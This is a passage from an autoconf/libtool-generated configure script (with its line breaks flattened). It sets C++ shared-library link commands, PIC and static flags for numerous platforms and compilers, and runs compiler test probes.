$output_objdir/$libname.ver~ cat $export_symbols | sed -e "s/\(.*\)/\1;/" >> $output_objdir/$libname.ver~ echo "local: *; };" >> $output_objdir/$libname.ver~ $CC -qmkshrobj $libobjs $deplibs $compiler_flags $wl-soname $wl$soname $wl-version-script $wl$output_objdir/$libname.ver -o $lib' fi ;; *) case `$CC -V 2>&1 | sed 5q` in *Sun\ C*) # Sun C++ 5.9 no_undefined_flag_CXX=' -zdefs' archive_cmds_CXX='$CC -G$allow_undefined_flag -h$soname -o $lib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags' archive_expsym_cmds_CXX='$CC -G$allow_undefined_flag -h$soname -o $lib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-retain-symbols-file $wl$export_symbols' hardcode_libdir_flag_spec_CXX='-R$libdir' whole_archive_flag_spec_CXX='$wl--whole-archive`new_convenience=; for conv in $convenience\"\"; do test -z \"$conv\" || new_convenience=\"$new_convenience,$conv\"; done; func_echo_all \"$new_convenience\"` $wl--no-whole-archive' compiler_needs_object_CXX=yes # Not sure whether something based on # $CC $CFLAGS -v conftest.$objext -o libconftest$shared_ext 2>&1 # would be better. output_verbose_link_cmd='func_echo_all' # Archives containing C++ object files must be created using # "CC -xar", where "CC" is the Sun C++ compiler. This is # necessary to make sure instantiated templates are included # in the archive. old_archive_cmds_CXX='$CC -xar -o $oldlib $oldobjs' ;; esac ;; esac ;; lynxos*) # FIXME: insert proper C++ library support ld_shlibs_CXX=no ;; m88k*) # FIXME: insert proper C++ library support ld_shlibs_CXX=no ;; mvs*) case $cc_basename in cxx*) # FIXME: insert proper C++ library support ld_shlibs_CXX=no ;; *) # FIXME: insert proper C++ library support ld_shlibs_CXX=no ;; esac ;; netbsd*) if echo __ELF__ | $CC -E - | $GREP __ELF__ >/dev/null; then archive_cmds_CXX='$LD -Bshareable -o $lib $predep_objects $libobjs $deplibs $postdep_objects $linker_flags' wlarc= hardcode_libdir_flag_spec_CXX='-R$libdir' hardcode_direct_CXX=yes hardcode_shlibpath_var_CXX=no fi # Workaround some broken pre-1.5 toolchains output_verbose_link_cmd='$CC -shared $CFLAGS -v conftest.$objext 2>&1 | $GREP conftest.$objext | $SED -e "s:-lgcc -lc -lgcc::"' ;; *nto* | *qnx*) ld_shlibs_CXX=yes ;; openbsd* | bitrig*) if test -f /usr/libexec/ld.so; then hardcode_direct_CXX=yes hardcode_shlibpath_var_CXX=no hardcode_direct_absolute_CXX=yes archive_cmds_CXX='$CC -shared $pic_flag $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags -o $lib' hardcode_libdir_flag_spec_CXX='$wl-rpath,$libdir' if test -z "`echo __ELF__ | $CC -E - | grep __ELF__`"; then archive_expsym_cmds_CXX='$CC -shared $pic_flag $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-retain-symbols-file,$export_symbols -o $lib' export_dynamic_flag_spec_CXX='$wl-E' whole_archive_flag_spec_CXX=$wlarc'--whole-archive$convenience '$wlarc'--no-whole-archive' fi output_verbose_link_cmd=func_echo_all else ld_shlibs_CXX=no fi ;; osf3* | osf4* | osf5*) case $cc_basename in KCC*) # Kuck and Associates, Inc. (KAI) C++ Compiler # KCC will only create a shared library if the output file # ends with ".so" (or ".sl" for HP-UX), so rename the library # to its proper name (with version) after linking. archive_cmds_CXX='tempext=`echo $shared_ext | $SED -e '\''s/\([^()0-9A-Za-z{}]\)/\\\\\1/g'\''`; templib=`echo "$lib" | $SED -e "s/\$tempext\..*/.so/"`; $CC $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags --soname $soname -o \$templib; mv \$templib $lib' hardcode_libdir_flag_spec_CXX='$wl-rpath,$libdir' hardcode_libdir_separator_CXX=: # Archives containing C++ object files must be created using # the KAI C++ compiler. case $host in osf3*) old_archive_cmds_CXX='$CC -Bstatic -o $oldlib $oldobjs' ;; *) old_archive_cmds_CXX='$CC -o $oldlib $oldobjs' ;; esac ;; RCC*) # Rational C++ 2.4.1 # FIXME: insert proper C++ library support ld_shlibs_CXX=no ;; cxx*) case $host in osf3*) allow_undefined_flag_CXX=' $wl-expect_unresolved $wl\*' archive_cmds_CXX='$CC -shared$allow_undefined_flag $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-soname $soname `test -n "$verstring" && func_echo_all "$wl-set_version $verstring"` -update_registry $output_objdir/so_locations -o $lib' hardcode_libdir_flag_spec_CXX='$wl-rpath $wl$libdir' ;; *) allow_undefined_flag_CXX=' -expect_unresolved \*' archive_cmds_CXX='$CC -shared$allow_undefined_flag $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags -msym -soname $soname `test -n "$verstring" && func_echo_all "-set_version $verstring"` -update_registry $output_objdir/so_locations -o $lib' archive_expsym_cmds_CXX='for i in `cat $export_symbols`; do printf "%s %s\\n" -exported_symbol "\$i" >> $lib.exp; done~ echo "-hidden">> $lib.exp~ $CC -shared$allow_undefined_flag $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags -msym -soname $soname $wl-input $wl$lib.exp `test -n "$verstring" && $ECHO "-set_version $verstring"` -update_registry $output_objdir/so_locations -o $lib~ $RM $lib.exp' hardcode_libdir_flag_spec_CXX='-rpath $libdir' ;; esac hardcode_libdir_separator_CXX=: # Commands to make compiler produce verbose output that lists # what "hidden" libraries, object files and flags are used when # linking a shared library. # # There doesn't appear to be a way to prevent this compiler from # explicitly linking system object files so we need to strip them # from the output so that they don't get included in the library # dependencies. output_verbose_link_cmd='templist=`$CC -shared $CFLAGS -v conftest.$objext 2>&1 | $GREP "ld" | $GREP -v "ld:"`; templist=`func_echo_all "$templist" | $SED "s/\(^.*ld.*\)\( .*ld.*$\)/\1/"`; list= ; for z in $templist; do case $z in conftest.$objext) list="$list $z";; *.$objext);; *) list="$list $z";;esac; done; func_echo_all "$list"' ;; *) if test yes,no = "$GXX,$with_gnu_ld"; then allow_undefined_flag_CXX=' $wl-expect_unresolved $wl\*' case $host in osf3*) archive_cmds_CXX='$CC -shared -nostdlib $allow_undefined_flag $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-soname $wl$soname `test -n "$verstring" && func_echo_all "$wl-set_version $wl$verstring"` $wl-update_registry $wl$output_objdir/so_locations -o $lib' ;; *) archive_cmds_CXX='$CC -shared $pic_flag -nostdlib $allow_undefined_flag $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-msym $wl-soname $wl$soname `test -n "$verstring" && func_echo_all "$wl-set_version $wl$verstring"` $wl-update_registry $wl$output_objdir/so_locations -o $lib' ;; esac hardcode_libdir_flag_spec_CXX='$wl-rpath $wl$libdir' hardcode_libdir_separator_CXX=: # Commands to make compiler produce verbose output that lists # what "hidden" libraries, object files and flags are used when # linking a shared library. output_verbose_link_cmd='$CC -shared $CFLAGS -v conftest.$objext 2>&1 | $GREP -v "^Configured with:" | $GREP "\-L"' else # FIXME: insert proper C++ library support ld_shlibs_CXX=no fi ;; esac ;; psos*) # FIXME: insert proper C++ library support ld_shlibs_CXX=no ;; sunos4*) case $cc_basename in CC*) # Sun C++ 4.x # FIXME: insert proper C++ library support ld_shlibs_CXX=no ;; lcc*) # Lucid # FIXME: insert proper C++ library support ld_shlibs_CXX=no ;; *) # FIXME: insert proper C++ library support ld_shlibs_CXX=no ;; esac ;; solaris*) case $cc_basename in CC* | sunCC*) # Sun C++ 4.2, 5.x and Centerline C++ archive_cmds_need_lc_CXX=yes no_undefined_flag_CXX=' -zdefs' archive_cmds_CXX='$CC -G$allow_undefined_flag -h$soname -o $lib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags' archive_expsym_cmds_CXX='echo "{ global:" > $lib.exp~cat $export_symbols | $SED -e "s/\(.*\)/\1;/" >> $lib.exp~echo "local: *; };" >> $lib.exp~ $CC -G$allow_undefined_flag $wl-M $wl$lib.exp -h$soname -o $lib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags~$RM $lib.exp' hardcode_libdir_flag_spec_CXX='-R$libdir' hardcode_shlibpath_var_CXX=no case $host_os in solaris2.[0-5] | solaris2.[0-5].*) ;; *) # The compiler driver will combine and reorder linker options, # but understands '-z linker_flag'. # Supported since Solaris 2.6 (maybe 2.5.1?) whole_archive_flag_spec_CXX='-z allextract$convenience -z defaultextract' ;; esac link_all_deplibs_CXX=yes output_verbose_link_cmd='func_echo_all' # Archives containing C++ object files must be created using # "CC -xar", where "CC" is the Sun C++ compiler. This is # necessary to make sure instantiated templates are included # in the archive. old_archive_cmds_CXX='$CC -xar -o $oldlib $oldobjs' ;; gcx*) # Green Hills C++ Compiler archive_cmds_CXX='$CC -shared $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-h $wl$soname -o $lib' # The C++ compiler must be used to create the archive. old_archive_cmds_CXX='$CC $LDFLAGS -archive -o $oldlib $oldobjs' ;; *) # GNU C++ compiler with Solaris linker if test yes,no = "$GXX,$with_gnu_ld"; then no_undefined_flag_CXX=' $wl-z ${wl}defs' if $CC --version | $GREP -v '^2\.7' > /dev/null; then archive_cmds_CXX='$CC -shared $pic_flag -nostdlib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-h $wl$soname -o $lib' archive_expsym_cmds_CXX='echo "{ global:" > $lib.exp~cat $export_symbols | $SED -e "s/\(.*\)/\1;/" >> $lib.exp~echo "local: *; };" >> $lib.exp~ $CC -shared $pic_flag -nostdlib $wl-M $wl$lib.exp $wl-h $wl$soname -o $lib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags~$RM $lib.exp' # Commands to make compiler produce verbose output that lists # what "hidden" libraries, object files and flags are used when # linking a shared library. output_verbose_link_cmd='$CC -shared $CFLAGS -v conftest.$objext 2>&1 | $GREP -v "^Configured with:" | $GREP "\-L"' else # g++ 2.7 appears to require '-G' NOT '-shared' on this # platform. archive_cmds_CXX='$CC -G -nostdlib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-h $wl$soname -o $lib' archive_expsym_cmds_CXX='echo "{ global:" > $lib.exp~cat $export_symbols | $SED -e "s/\(.*\)/\1;/" >> $lib.exp~echo "local: *; };" >> $lib.exp~ $CC -G -nostdlib $wl-M $wl$lib.exp $wl-h $wl$soname -o $lib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags~$RM $lib.exp' # Commands to make compiler produce verbose output that lists # what "hidden" libraries, object files and flags are used when # linking a shared library. output_verbose_link_cmd='$CC -G $CFLAGS -v conftest.$objext 2>&1 | $GREP -v "^Configured with:" | $GREP "\-L"' fi hardcode_libdir_flag_spec_CXX='$wl-R $wl$libdir' case $host_os in solaris2.[0-5] | solaris2.[0-5].*) ;; *) whole_archive_flag_spec_CXX='$wl-z ${wl}allextract$convenience $wl-z ${wl}defaultextract' ;; esac fi ;; esac ;; sysv4*uw2* | sysv5OpenUNIX* | sysv5UnixWare7.[01].[10]* | unixware7* | sco3.2v5.0.[024]*) no_undefined_flag_CXX='$wl-z,text' archive_cmds_need_lc_CXX=no hardcode_shlibpath_var_CXX=no runpath_var='LD_RUN_PATH' case $cc_basename in CC*) archive_cmds_CXX='$CC -G $wl-h,$soname -o $lib $libobjs $deplibs $compiler_flags' archive_expsym_cmds_CXX='$CC -G $wl-Bexport:$export_symbols $wl-h,$soname -o $lib $libobjs $deplibs $compiler_flags' ;; *) archive_cmds_CXX='$CC -shared $wl-h,$soname -o $lib $libobjs $deplibs $compiler_flags' archive_expsym_cmds_CXX='$CC -shared $wl-Bexport:$export_symbols $wl-h,$soname -o $lib $libobjs $deplibs $compiler_flags' ;; esac ;; sysv5* | sco3.2v5* | sco5v6*) # Note: We CANNOT use -z defs as we might desire, because we do not # link with -lc, and that would cause any symbols used from libc to # always be unresolved, which means just about no library would # ever link correctly. If we're not using GNU ld we use -z text # though, which does catch some bad symbols but isn't as heavy-handed # as -z defs. no_undefined_flag_CXX='$wl-z,text' allow_undefined_flag_CXX='$wl-z,nodefs' archive_cmds_need_lc_CXX=no hardcode_shlibpath_var_CXX=no hardcode_libdir_flag_spec_CXX='$wl-R,$libdir' hardcode_libdir_separator_CXX=':' link_all_deplibs_CXX=yes export_dynamic_flag_spec_CXX='$wl-Bexport' runpath_var='LD_RUN_PATH' case $cc_basename in CC*) archive_cmds_CXX='$CC -G $wl-h,$soname -o $lib $libobjs $deplibs $compiler_flags' archive_expsym_cmds_CXX='$CC -G $wl-Bexport:$export_symbols $wl-h,$soname -o $lib $libobjs $deplibs $compiler_flags' old_archive_cmds_CXX='$CC -Tprelink_objects $oldobjs~ '"$old_archive_cmds_CXX" reload_cmds_CXX='$CC -Tprelink_objects $reload_objs~ '"$reload_cmds_CXX" ;; *) archive_cmds_CXX='$CC -shared $wl-h,$soname -o $lib $libobjs $deplibs $compiler_flags' archive_expsym_cmds_CXX='$CC -shared $wl-Bexport:$export_symbols $wl-h,$soname -o $lib $libobjs $deplibs $compiler_flags' ;; esac ;; tandem*) case $cc_basename in NCC*) # NonStop-UX NCC 3.20 # FIXME: insert proper C++ library support ld_shlibs_CXX=no ;; *) # FIXME: insert proper C++ library support ld_shlibs_CXX=no ;; esac ;; vxworks*) # FIXME: insert proper C++ library support ld_shlibs_CXX=no ;; *) # FIXME: insert proper C++ library support ld_shlibs_CXX=no ;; esac { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ld_shlibs_CXX" >&5 $as_echo "$ld_shlibs_CXX" >&6; } test no = "$ld_shlibs_CXX" && can_build_shared=no GCC_CXX=$GXX LD_CXX=$LD ## CAVEAT EMPTOR: ## There is no encapsulation within the following macros, do not change ## the running order or otherwise move them around unless you know exactly ## what you are doing... # Dependencies to place before and after the object being linked: predep_objects_CXX= postdep_objects_CXX= predeps_CXX= postdeps_CXX= compiler_lib_search_path_CXX= cat > conftest.$ac_ext <<_LT_EOF class Foo { public: Foo (void) { a = 0; } private: int a; }; _LT_EOF _lt_libdeps_save_CFLAGS=$CFLAGS case "$CC $CFLAGS " in #( *\ -flto*\ *) CFLAGS="$CFLAGS -fno-lto" ;; *\ -fwhopr*\ *) CFLAGS="$CFLAGS -fno-whopr" ;; *\ -fuse-linker-plugin*\ *) CFLAGS="$CFLAGS -fno-use-linker-plugin" ;; esac if { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$ac_compile\""; } >&5 (eval $ac_compile) 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; }; then # Parse the compiler output and extract the necessary # objects, libraries and library flags. # Sentinel used to keep track of whether or not we are before # the conftest object file. pre_test_object_deps_done=no for p in `eval "$output_verbose_link_cmd"`; do case $prev$p in -L* | -R* | -l*) # Some compilers place space between "-{L,R}" and the path. # Remove the space. if test x-L = "$p" || test x-R = "$p"; then prev=$p continue fi # Expand the sysroot to ease extracting the directories later. if test -z "$prev"; then case $p in -L*) func_stripname_cnf '-L' '' "$p"; prev=-L; p=$func_stripname_result ;; -R*) func_stripname_cnf '-R' '' "$p"; prev=-R; p=$func_stripname_result ;; -l*) func_stripname_cnf '-l' '' "$p"; prev=-l; p=$func_stripname_result ;; esac fi case $p in =*) func_stripname_cnf '=' '' "$p"; p=$lt_sysroot$func_stripname_result ;; esac if test no = "$pre_test_object_deps_done"; then case $prev in -L | -R) # Internal compiler library paths should come after those # provided the user. The postdeps already come after the # user supplied libs so there is no need to process them. if test -z "$compiler_lib_search_path_CXX"; then compiler_lib_search_path_CXX=$prev$p else compiler_lib_search_path_CXX="${compiler_lib_search_path_CXX} $prev$p" fi ;; # The "-l" case would never come before the object being # linked, so don't bother handling this case. esac else if test -z "$postdeps_CXX"; then postdeps_CXX=$prev$p else postdeps_CXX="${postdeps_CXX} $prev$p" fi fi prev= ;; *.lto.$objext) ;; # Ignore GCC LTO objects *.$objext) # This assumes that the test object file only shows up # once in the compiler output. if test "$p" = "conftest.$objext"; then pre_test_object_deps_done=yes continue fi if test no = "$pre_test_object_deps_done"; then if test -z "$predep_objects_CXX"; then predep_objects_CXX=$p else predep_objects_CXX="$predep_objects_CXX $p" fi else if test -z "$postdep_objects_CXX"; then postdep_objects_CXX=$p else postdep_objects_CXX="$postdep_objects_CXX $p" fi fi ;; *) ;; # Ignore the rest. esac done # Clean up. rm -f a.out a.exe else echo "libtool.m4: error: problem compiling CXX test program" fi $RM -f confest.$objext CFLAGS=$_lt_libdeps_save_CFLAGS # PORTME: override above test on systems where it is broken case $host_os in interix[3-9]*) # Interix 3.5 installs completely hosed .la files for C++, so rather than # hack all around it, let's just trust "g++" to DTRT. predep_objects_CXX= postdep_objects_CXX= postdeps_CXX= ;; esac case " $postdeps_CXX " in *" -lc "*) archive_cmds_need_lc_CXX=no ;; esac compiler_lib_search_dirs_CXX= if test -n "${compiler_lib_search_path_CXX}"; then compiler_lib_search_dirs_CXX=`echo " ${compiler_lib_search_path_CXX}" | $SED -e 's! -L! !g' -e 's!^ !!'` fi lt_prog_compiler_wl_CXX= lt_prog_compiler_pic_CXX= lt_prog_compiler_static_CXX= # C++ specific cases for pic, static, wl, etc. if test yes = "$GXX"; then lt_prog_compiler_wl_CXX='-Wl,' lt_prog_compiler_static_CXX='-static' case $host_os in aix*) # All AIX code is PIC. if test ia64 = "$host_cpu"; then # AIX 5 now supports IA64 processor lt_prog_compiler_static_CXX='-Bstatic' fi lt_prog_compiler_pic_CXX='-fPIC' ;; amigaos*) case $host_cpu in powerpc) # see comment about AmigaOS4 .so support lt_prog_compiler_pic_CXX='-fPIC' ;; m68k) # FIXME: we need at least 68020 code to build shared libraries, but # adding the '-m68020' flag to GCC prevents building anything better, # like '-m68040'. lt_prog_compiler_pic_CXX='-m68020 -resident32 -malways-restore-a4' ;; esac ;; beos* | irix5* | irix6* | nonstopux* | osf3* | osf4* | osf5*) # PIC is the default for these OSes. ;; mingw* | cygwin* | os2* | pw32* | cegcc*) # This hack is so that the source file can tell whether it is being # built for inclusion in a dll (and should export symbols for example). # Although the cygwin gcc ignores -fPIC, still need this for old-style # (--disable-auto-import) libraries lt_prog_compiler_pic_CXX='-DDLL_EXPORT' case $host_os in os2*) lt_prog_compiler_static_CXX='$wl-static' ;; esac ;; darwin* | rhapsody*) # PIC is the default on this platform # Common symbols not allowed in MH_DYLIB files lt_prog_compiler_pic_CXX='-fno-common' ;; *djgpp*) # DJGPP does not support shared libraries at all lt_prog_compiler_pic_CXX= ;; haiku*) # PIC is the default for Haiku. # The "-static" flag exists, but is broken. lt_prog_compiler_static_CXX= ;; interix[3-9]*) # Interix 3.x gcc -fpic/-fPIC options generate broken code. # Instead, we relocate shared libraries at runtime. ;; sysv4*MP*) if test -d /usr/nec; then lt_prog_compiler_pic_CXX=-Kconform_pic fi ;; hpux*) # PIC is the default for 64-bit PA HP-UX, but not for 32-bit # PA HP-UX. On IA64 HP-UX, PIC is the default but the pic flag # sets the default TLS model and affects inlining. case $host_cpu in hppa*64*) ;; *) lt_prog_compiler_pic_CXX='-fPIC' ;; esac ;; *qnx* | *nto*) # QNX uses GNU C++, but need to define -shared option too, otherwise # it will coredump. lt_prog_compiler_pic_CXX='-fPIC -shared' ;; *) lt_prog_compiler_pic_CXX='-fPIC' ;; esac else case $host_os in aix[4-9]*) # All AIX code is PIC. if test ia64 = "$host_cpu"; then # AIX 5 now supports IA64 processor lt_prog_compiler_static_CXX='-Bstatic' else lt_prog_compiler_static_CXX='-bnso -bI:/lib/syscalls.exp' fi ;; chorus*) case $cc_basename in cxch68*) # Green Hills C++ Compiler # _LT_TAGVAR(lt_prog_compiler_static, CXX)="--no_auto_instantiation -u __main -u __premain -u _abort -r $COOL_DIR/lib/libOrb.a $MVME_DIR/lib/CC/libC.a $MVME_DIR/lib/classix/libcx.s.a" ;; esac ;; mingw* | cygwin* | os2* | pw32* | cegcc*) # This hack is so that the source file can tell whether it is being # built for inclusion in a dll (and should export symbols for example). lt_prog_compiler_pic_CXX='-DDLL_EXPORT' ;; dgux*) case $cc_basename in ec++*) lt_prog_compiler_pic_CXX='-KPIC' ;; ghcx*) # Green Hills C++ Compiler lt_prog_compiler_pic_CXX='-pic' ;; *) ;; esac ;; freebsd* | dragonfly*) # FreeBSD uses GNU C++ ;; hpux9* | hpux10* | hpux11*) case $cc_basename in CC*) lt_prog_compiler_wl_CXX='-Wl,' lt_prog_compiler_static_CXX='$wl-a ${wl}archive' if test ia64 != "$host_cpu"; then lt_prog_compiler_pic_CXX='+Z' fi ;; aCC*) lt_prog_compiler_wl_CXX='-Wl,' lt_prog_compiler_static_CXX='$wl-a ${wl}archive' case $host_cpu in hppa*64*|ia64*) # +Z the default ;; *) lt_prog_compiler_pic_CXX='+Z' ;; esac ;; *) ;; esac ;; interix*) # This is c89, which is MS Visual C++ (no shared libs) # Anyone wants to do a port? ;; irix5* | irix6* | nonstopux*) case $cc_basename in CC*) lt_prog_compiler_wl_CXX='-Wl,' lt_prog_compiler_static_CXX='-non_shared' # CC pic flag -KPIC is the default. ;; *) ;; esac ;; linux* | k*bsd*-gnu | kopensolaris*-gnu | gnu*) case $cc_basename in KCC*) # KAI C++ Compiler lt_prog_compiler_wl_CXX='--backend -Wl,' lt_prog_compiler_pic_CXX='-fPIC' ;; ecpc* ) # old Intel C++ for x86_64, which still supported -KPIC. lt_prog_compiler_wl_CXX='-Wl,' lt_prog_compiler_pic_CXX='-KPIC' lt_prog_compiler_static_CXX='-static' ;; icpc* ) # Intel C++, used to be incompatible with GCC. # ICC 10 doesn't accept -KPIC any more. lt_prog_compiler_wl_CXX='-Wl,' lt_prog_compiler_pic_CXX='-fPIC' lt_prog_compiler_static_CXX='-static' ;; pgCC* | pgcpp*) # Portland Group C++ compiler lt_prog_compiler_wl_CXX='-Wl,' lt_prog_compiler_pic_CXX='-fpic' lt_prog_compiler_static_CXX='-Bstatic' ;; cxx*) # Compaq C++ # Make sure the PIC flag is empty. It appears that all Alpha # Linux and Compaq Tru64 Unix objects are PIC. lt_prog_compiler_pic_CXX= lt_prog_compiler_static_CXX='-non_shared' ;; xlc* | xlC* | bgxl[cC]* | mpixl[cC]*) # IBM XL 8.0, 9.0 on PPC and BlueGene lt_prog_compiler_wl_CXX='-Wl,' lt_prog_compiler_pic_CXX='-qpic' lt_prog_compiler_static_CXX='-qstaticlink' ;; *) case `$CC -V 2>&1 | sed 5q` in *Sun\ C*) # Sun C++ 5.9 lt_prog_compiler_pic_CXX='-KPIC' lt_prog_compiler_static_CXX='-Bstatic' lt_prog_compiler_wl_CXX='-Qoption ld ' ;; esac ;; esac ;; lynxos*) ;; m88k*) ;; mvs*) case $cc_basename in cxx*) lt_prog_compiler_pic_CXX='-W c,exportall' ;; *) ;; esac ;; netbsd*) ;; *qnx* | *nto*) # QNX uses GNU C++, but need to define -shared option too, otherwise # it will coredump. lt_prog_compiler_pic_CXX='-fPIC -shared' ;; osf3* | osf4* | osf5*) case $cc_basename in KCC*) lt_prog_compiler_wl_CXX='--backend -Wl,' ;; RCC*) # Rational C++ 2.4.1 lt_prog_compiler_pic_CXX='-pic' ;; cxx*) # Digital/Compaq C++ lt_prog_compiler_wl_CXX='-Wl,' # Make sure the PIC flag is empty. It appears that all Alpha # Linux and Compaq Tru64 Unix objects are PIC. lt_prog_compiler_pic_CXX= lt_prog_compiler_static_CXX='-non_shared' ;; *) ;; esac ;; psos*) ;; solaris*) case $cc_basename in CC* | sunCC*) # Sun C++ 4.2, 5.x and Centerline C++ lt_prog_compiler_pic_CXX='-KPIC' lt_prog_compiler_static_CXX='-Bstatic' lt_prog_compiler_wl_CXX='-Qoption ld ' ;; gcx*) # Green Hills C++ Compiler lt_prog_compiler_pic_CXX='-PIC' ;; *) ;; esac ;; sunos4*) case $cc_basename in CC*) # Sun C++ 4.x lt_prog_compiler_pic_CXX='-pic' lt_prog_compiler_static_CXX='-Bstatic' ;; lcc*) # Lucid lt_prog_compiler_pic_CXX='-pic' ;; *) ;; esac ;; sysv5* | unixware* | sco3.2v5* | sco5v6* | OpenUNIX*) case $cc_basename in CC*) lt_prog_compiler_wl_CXX='-Wl,' lt_prog_compiler_pic_CXX='-KPIC' lt_prog_compiler_static_CXX='-Bstatic' ;; esac ;; tandem*) case $cc_basename in NCC*) # NonStop-UX NCC 3.20 lt_prog_compiler_pic_CXX='-KPIC' ;; *) ;; esac ;; vxworks*) ;; *) lt_prog_compiler_can_build_shared_CXX=no ;; esac fi case $host_os in # For platforms that do not support PIC, -DPIC is meaningless: *djgpp*) lt_prog_compiler_pic_CXX= ;; *) lt_prog_compiler_pic_CXX="$lt_prog_compiler_pic_CXX -DPIC" ;; esac { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $compiler option to produce PIC" >&5 $as_echo_n "checking for $compiler option to produce PIC... " >&6; } if ${lt_cv_prog_compiler_pic_CXX+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_prog_compiler_pic_CXX=$lt_prog_compiler_pic_CXX fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_prog_compiler_pic_CXX" >&5 $as_echo "$lt_cv_prog_compiler_pic_CXX" >&6; } lt_prog_compiler_pic_CXX=$lt_cv_prog_compiler_pic_CXX # # Check to make sure the PIC flag actually works. # if test -n "$lt_prog_compiler_pic_CXX"; then { $as_echo "$as_me:${as_lineno-$LINENO}: checking if $compiler PIC flag $lt_prog_compiler_pic_CXX works" >&5 $as_echo_n "checking if $compiler PIC flag $lt_prog_compiler_pic_CXX works... " >&6; } if ${lt_cv_prog_compiler_pic_works_CXX+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_prog_compiler_pic_works_CXX=no ac_outfile=conftest.$ac_objext echo "$lt_simple_compile_test_code" > conftest.$ac_ext lt_compiler_flag="$lt_prog_compiler_pic_CXX -DPIC" ## exclude from sc_useless_quotes_in_assignment # Insert the option either (1) after the last *FLAGS variable, or # (2) before a word containing "conftest.", or (3) at the end. # Note that $ac_compile itself does not contain backslashes and begins # with a dollar sign (not a hyphen), so the echo should work correctly. # The option is referenced via a variable to avoid confusing sed. lt_compile=`echo "$ac_compile" | $SED \ -e 's:.*FLAGS}\{0,1\} :&$lt_compiler_flag :; t' \ -e 's: [^ ]*conftest\.: $lt_compiler_flag&:; t' \ -e 's:$: $lt_compiler_flag:'` (eval echo "\"\$as_me:$LINENO: $lt_compile\"" >&5) (eval "$lt_compile" 2>conftest.err) ac_status=$? cat conftest.err >&5 echo "$as_me:$LINENO: \$? = $ac_status" >&5 if (exit $ac_status) && test -s "$ac_outfile"; then # The compiler can only warn and ignore the option if not recognized # So say no if there are warnings other than the usual output. $ECHO "$_lt_compiler_boilerplate" | $SED '/^$/d' >conftest.exp $SED '/^$/d; /^ *+/d' conftest.err >conftest.er2 if test ! -s conftest.er2 || diff conftest.exp conftest.er2 >/dev/null; then lt_cv_prog_compiler_pic_works_CXX=yes fi fi $RM conftest* fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_prog_compiler_pic_works_CXX" >&5 $as_echo "$lt_cv_prog_compiler_pic_works_CXX" >&6; } if test yes = "$lt_cv_prog_compiler_pic_works_CXX"; then case $lt_prog_compiler_pic_CXX in "" | " "*) ;; *) lt_prog_compiler_pic_CXX=" $lt_prog_compiler_pic_CXX" ;; esac else lt_prog_compiler_pic_CXX= lt_prog_compiler_can_build_shared_CXX=no fi fi # # Check to make sure the static flag actually works. # wl=$lt_prog_compiler_wl_CXX eval lt_tmp_static_flag=\"$lt_prog_compiler_static_CXX\" { $as_echo "$as_me:${as_lineno-$LINENO}: checking if $compiler static flag $lt_tmp_static_flag works" >&5 $as_echo_n "checking if $compiler static flag $lt_tmp_static_flag works... " >&6; } if ${lt_cv_prog_compiler_static_works_CXX+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_prog_compiler_static_works_CXX=no save_LDFLAGS=$LDFLAGS LDFLAGS="$LDFLAGS $lt_tmp_static_flag" echo "$lt_simple_link_test_code" > conftest.$ac_ext if (eval $ac_link 2>conftest.err) && test -s conftest$ac_exeext; then # The linker can only warn and ignore the option if not recognized # So say no if there are warnings if test -s conftest.err; then # Append any errors to the config.log. cat conftest.err 1>&5 $ECHO "$_lt_linker_boilerplate" | $SED '/^$/d' > conftest.exp $SED '/^$/d; /^ *+/d' conftest.err >conftest.er2 if diff conftest.exp conftest.er2 >/dev/null; then lt_cv_prog_compiler_static_works_CXX=yes fi else lt_cv_prog_compiler_static_works_CXX=yes fi fi $RM -r conftest* LDFLAGS=$save_LDFLAGS fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_prog_compiler_static_works_CXX" >&5 $as_echo "$lt_cv_prog_compiler_static_works_CXX" >&6; } if test yes = "$lt_cv_prog_compiler_static_works_CXX"; then : else lt_prog_compiler_static_CXX= fi { $as_echo "$as_me:${as_lineno-$LINENO}: checking if $compiler supports -c -o file.$ac_objext" >&5 $as_echo_n "checking if $compiler supports -c -o file.$ac_objext... " >&6; } if ${lt_cv_prog_compiler_c_o_CXX+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_prog_compiler_c_o_CXX=no $RM -r conftest 2>/dev/null mkdir conftest cd conftest mkdir out echo "$lt_simple_compile_test_code" > conftest.$ac_ext lt_compiler_flag="-o out/conftest2.$ac_objext" # Insert the option either (1) after the last *FLAGS variable, or # (2) before a word containing "conftest.", or (3) at the end. # Note that $ac_compile itself does not contain backslashes and begins # with a dollar sign (not a hyphen), so the echo should work correctly. lt_compile=`echo "$ac_compile" | $SED \ -e 's:.*FLAGS}\{0,1\} :&$lt_compiler_flag :; t' \ -e 's: [^ ]*conftest\.: $lt_compiler_flag&:; t' \ -e 's:$: $lt_compiler_flag:'` (eval echo "\"\$as_me:$LINENO: $lt_compile\"" >&5) (eval "$lt_compile" 2>out/conftest.err) ac_status=$? cat out/conftest.err >&5 echo "$as_me:$LINENO: \$? = $ac_status" 